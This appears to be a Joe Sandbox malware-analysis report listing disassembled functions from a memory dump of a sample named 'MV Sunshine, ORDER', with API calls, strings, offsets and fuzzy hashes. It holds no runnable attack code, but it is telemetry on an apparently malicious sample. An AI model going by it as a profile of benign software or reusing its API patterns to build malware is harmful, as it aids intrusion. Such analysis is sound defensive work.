CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?,?,009D799D), ref: 009D766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D7698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?), ref: 009D76A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D76B4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
Instruction ID: df4afcce6c200828e5ff565bc3cf4d0df92b284da73c57c0c9e1aa72ce4116b5
Opcode Fuzzy Hash: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
Instruction Fuzzy Hash: A8018472601608BFDB209F98DC44BAABBADEB44751F54802AFD04E2311F731DD42D7A1

Function 009D85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D8608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D8612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D8621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D8628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D863E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
Instruction ID: f944e4edb654d21e31cbee83d0dec866d07b962067408becf7c13365f3defc55
Opcode Fuzzy Hash: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
Instruction Fuzzy Hash: 08F04F31245308AFEB204FE9DC89E6B3BACEF89764B408526FA45D7251DB61DC42DA60

Function 009D8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D8673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D869F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
Instruction ID: 7ec1532e03690287c77e2dc17dbb97eb5829e5825170429a90374607a931ca9c
Opcode Fuzzy Hash: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
Instruction Fuzzy Hash: 13F0C270240308BFEB215FA4EC88E673BACEF89764B504036FA05E7251DB70DC02DA60

Function 009DC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 009DC6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 009DC6D1
MessageBeep.USER32(00000000), ref: 009DC6E9
KillTimer.USER32(?,0000040A), ref: 009DC705
EndDialog.USER32(?,00000001), ref: 009DC71F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9d36ab0fb4b123e0ef2eeb879dc64ab4856de41df7fe1c2b6e4cb41c724de16d
Instruction ID: 7c6219e8cabb05cbef504ed4ec228e040abfdba90abc55b14223b9ff7b48bc29
Opcode Fuzzy Hash: 9d36ab0fb4b123e0ef2eeb879dc64ab4856de41df7fe1c2b6e4cb41c724de16d
Instruction Fuzzy Hash: 3F01A270440309ABEB319B60DD4EF96B7B8FF00705F04466AF582B15E0DBE5A956CF80

Function 009813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009813BF
StrokeAndFillPath.GDI32(?,?,009BBAD8,00000000,?), ref: 009813DB
SelectObject.GDI32(?,00000000), ref: 009813EE
DeleteObject.GDI32 ref: 00981401
StrokePath.GDI32(?), ref: 0098141C

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: d50e992db5e2e083e8a4271f674114c34aa2423f709f5609051b7bc321883459
Instruction ID: 90b43e4eafd29770315f3e141b4f1072a7bf2c7a69c50b5e19ffbe6353ab80ce
Opcode Fuzzy Hash: d50e992db5e2e083e8a4271f674114c34aa2423f709f5609051b7bc321883459
Instruction Fuzzy Hash: 88F0C97800430CEFDB26EFA6EC0C7583BA8A742326F04C225E429559F1D7368997DF51

Function 009EC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009EC69D
CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EC6B5

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

CoUninitialize.OLE32 ref: 009EC922

Strings

.lnk, xrefs: 009EC631, 009EC659, 009EC663

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 446f0eeb40c7abb5ca93a305ae0c3abde9653f029f66f9817573bd1868510634
Instruction ID: ea00edc9d180084912f542e7340e9d1c167eea8b4908c6877a01fb18052c6ed7
Opcode Fuzzy Hash: 446f0eeb40c7abb5ca93a305ae0c3abde9653f029f66f9817573bd1868510634
Instruction Fuzzy Hash: F5A11971108205AFD704EF64C881EABB7E8FF94704F04495DF196972A2EB71EA49CB52

Function 00992E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 00987BB1: _memmove.LIBCMT ref: 00987C0B

__swprintf.LIBCMT ref: 0099302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00992EC6

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 6ed6cbc5ef72a362555acd49bcee08fd34c9385045233b28f2f3b9136842e017
Instruction ID: 827283c4049878ad61e8b5c377bc07dafc4d55c836e526ca31118fcd2b0c20ce
Opcode Fuzzy Hash: 6ed6cbc5ef72a362555acd49bcee08fd34c9385045233b28f2f3b9136842e017
Instruction Fuzzy Hash: 3F916C715083019FCB18FF68D885E6EB7A8EF85740F14491DF496972A1DB60EE44CB92

Function 009EBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE

CoInitialize.OLE32(00000000), ref: 009EBC26
CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EBC3F
CoUninitialize.OLE32 ref: 009EBC5C

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

Strings

.lnk, xrefs: 009EBC08, 009EBC16

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 06c9f5cdb01d596130d0cb8f3fc05847e8f5f3321fc2b123e7e49f0c0177dab9
Instruction ID: 7c2cd56993ad8147f36c279b5d15c356ab5abfdb12de994754288cadcf493201
Opcode Fuzzy Hash: 06c9f5cdb01d596130d0cb8f3fc05847e8f5f3321fc2b123e7e49f0c0177dab9
Instruction Fuzzy Hash: 7DA178752043419FCB11EF15C884E6ABBE5FF88314F148998F89A9B3A1CB31ED45CB91

Function 009A524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 009A52DD

Part of subcall function 009B0340: __87except.LIBCMT ref: 009B037B

Strings

pow, xrefs: 009A52B5, 009A52D2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 7c9552d5afcb5cc29e5b5aa890267391c9bc9b728ed659d189b88e4fa00c659b
Instruction ID: 9c5dab74eb79ca83b67b6bf5ec6c8ad0490d332b91087ffa7b751ed55544a666
Opcode Fuzzy Hash: 7c9552d5afcb5cc29e5b5aa890267391c9bc9b728ed659d189b88e4fa00c659b
Instruction Fuzzy Hash: F1512961B0DA0197CB11B714CB413EF2BD89BC2760F218D68E495862E9EF788CD59AC6

Function 009A023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 009A0280
+, xrefs: 009A0277

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 16edde59c956fb80ae0de299c73edfac2435b009ccc3db7043447b3cbe1b7324
Instruction ID: ff380f3fd898f8b76e69946b0c2bdaae2a0a79f38f8e45e2d73dbd6ceedffdb4
Opcode Fuzzy Hash: 16edde59c956fb80ae0de299c73edfac2435b009ccc3db7043447b3cbe1b7324
Instruction Fuzzy Hash: 845133745442468FCF25DF68C4886FA7BA9EFAA310F158056EC919B3E0C7349C42CBB1

Function 009962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009963A8
_memmove.LIBCMT ref: 00996446
_memset.LIBCMT ref: 0099646A

Strings

ERCP, xrefs: 00996313

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 360328a87e580fef5188c22f26181f08023c4b8a440d37cf37a53858d7af5327
Instruction ID: 2a5d21d1848f6dfab18572350ea4fddedf5fa483f97d6290c5f2268224812df1
Opcode Fuzzy Hash: 360328a87e580fef5188c22f26181f08023c4b8a440d37cf37a53858d7af5327
Instruction Fuzzy Hash: 6651D471900709DFDB24CFA9C8817AABBF8FF44750F20856EEA4ACB250E775A580CB50

Function 00A07BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A0F910,00000000,?,?,?,?), ref: 00A07C4E
GetWindowLongW.USER32 ref: 00A07C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A07C7B

Strings

SysTreeView32, xrefs: 00A07C20

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 9ace71a3be96f401cc935515ba5a0966ce33a67c40e6e0de9cffb6c8ac1bd1a1
Instruction ID: 95f975f4e3dede672460def5af408d26b0bc84cbdfce6780e1ae1cdb50c2b8c7
Opcode Fuzzy Hash: 9ace71a3be96f401cc935515ba5a0966ce33a67c40e6e0de9cffb6c8ac1bd1a1
Instruction Fuzzy Hash: ED319E31A04209AFEB219F78EC41BEA77A9FB45324F244725F975A32E0D731E8519B60

Function 00A07648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A076D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A076E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A07708

Strings

SysMonthCal32, xrefs: 00A0769B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: d4244d9ece2640dde85ed3460015390295b00a94432aa2ac4076ec2e1532a2f5
Instruction ID: 6e3005d0877f9272fc99d53fada1417a47898c420bf3eeb5a43950cedc190184
Opcode Fuzzy Hash: d4244d9ece2640dde85ed3460015390295b00a94432aa2ac4076ec2e1532a2f5
Instruction Fuzzy Hash: A6218D3251021DABDF21CFA4DC46FEE3B69EB88754F110214FE156B1D0DAB2A8518BA0

Function 00A06F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A06FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A06FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A06FDF

Strings

Listbox, xrefs: 00A06F77

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: e758c3fe9e136a096f9bd12cd54f7428db35dbaa6077385ae7bbdfbb5846ff9e
Instruction ID: aa60da22455fcebbd532957c7e98c5d2a8ceb8f7dd14ca1683e25afb9695b0dc
Opcode Fuzzy Hash: e758c3fe9e136a096f9bd12cd54f7428db35dbaa6077385ae7bbdfbb5846ff9e
Instruction Fuzzy Hash: FB21A43261011DBFDF119F54EC85FAB37AAEF89768F018124FA159B1D0C671AC62CBA0

Function 00A0797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A079E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A079F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A07A03

Strings

msctls_trackbar32, xrefs: 00A079B8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a9636f6a3ad8d16f775edf5ea6ca4a914c24f479d589b26b50aa560af5d9ddde
Instruction ID: 243ae10dc8f565d937c409a7f2bedf846799ef8a3298cd7bffac8dd532e7798c
Opcode Fuzzy Hash: a9636f6a3ad8d16f775edf5ea6ca4a914c24f479d589b26b50aa560af5d9ddde
Instruction Fuzzy Hash: 0411E732654208BEEF109F60DC05FAF37A9EF89764F014519F641A60D0D272A811CB60

Function 00984C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00984C2E), ref: 00984CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984CB5

Strings

kernel32.dll, xrefs: 00984C9E
GetNativeSystemInfo, xrefs: 00984CAF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
Instruction ID: 2d6674756f6a9b0719033c11a7a0a943e606db343fc6ef593603e4d7c6989bae
Opcode Fuzzy Hash: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
Instruction Fuzzy Hash: B4D0173051072BDFDB30AF71EA1864676E9BF06791B11CC3A98C6E6A90E678D881CB50

Function 00984D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00984CE1,?), ref: 00984DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984DB4

Strings

kernel32.dll, xrefs: 00984D9D
Wow64RevertWow64FsRedirection, xrefs: 00984DAE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 114d542de3df89b4b3606f4bc9894e61d2c42ae7d31e169d7638f2bd6666d87f
Instruction ID: 832583cfe2627881cd6587ad34249bb3b4c7f5e69db26aea965b73549f9c88ca
Opcode Fuzzy Hash: 114d542de3df89b4b3606f4bc9894e61d2c42ae7d31e169d7638f2bd6666d87f
Instruction Fuzzy Hash: EBD01271550717DFD7309F71D80864676D8BF05355B118C3AD8C5E6690D774D881CB50

